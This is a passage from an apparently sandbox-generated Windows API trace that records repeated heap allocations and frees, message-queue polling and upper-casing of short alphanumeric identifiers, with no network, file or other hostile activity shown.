RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0213.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0213.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0213.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0213.790] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0213.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0213.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0213.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0213.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0213.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0213.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0213.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0213.791] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0213.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0213.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0213.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0213.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0213.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0213.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0213.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0213.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0213.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0213.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0213.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0213.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0213.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0213.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0213.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0213.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0213.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0213.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0213.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0213.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0213.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0213.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0213.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0213.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0213.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0213.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0213.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0213.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0213.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0213.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0213.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0213.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0213.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0213.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0213.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0213.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0213.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0213.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0213.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0213.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0213.794] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0213.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0213.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab230 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0213.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0213.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0213.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0213.795] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0213.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0213.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0213.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0213.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0213.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0213.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0213.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0213.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0213.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0213.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0213.795] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0213.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6f8 [0213.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x38542c0 [0213.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0213.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0213.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0213.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0213.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0213.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0213.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0213.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0213.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0213.796] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0213.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0213.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0213.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0213.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0213.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0213.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0213.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0213.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0213.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0213.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0213.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0213.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0213.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0213.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0213.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0213.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0213.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38542c0 | out: hHeap=0x2af0000) returned 1 [0213.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0213.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0213.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0213.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0213.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0213.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0213.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0213.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0213.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0213.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0213.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0213.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0213.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0213.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0213.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0213.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0213.797] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0213.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0213.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0213.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6b0 [0213.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x38546b0 [0213.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0213.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0213.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0213.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0213.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0213.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0213.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0213.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0213.798] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0213.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0213.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0213.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0213.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0213.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0213.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0213.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0213.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0213.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0213.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0213.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0213.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0213.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0213.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0213.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0213.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0213.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0213.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0213.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0213.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0213.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0213.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0213.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0213.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0213.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0213.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0213.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0213.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38546b0 | out: hHeap=0x2af0000) returned 1 [0213.799] HeapFree (in: 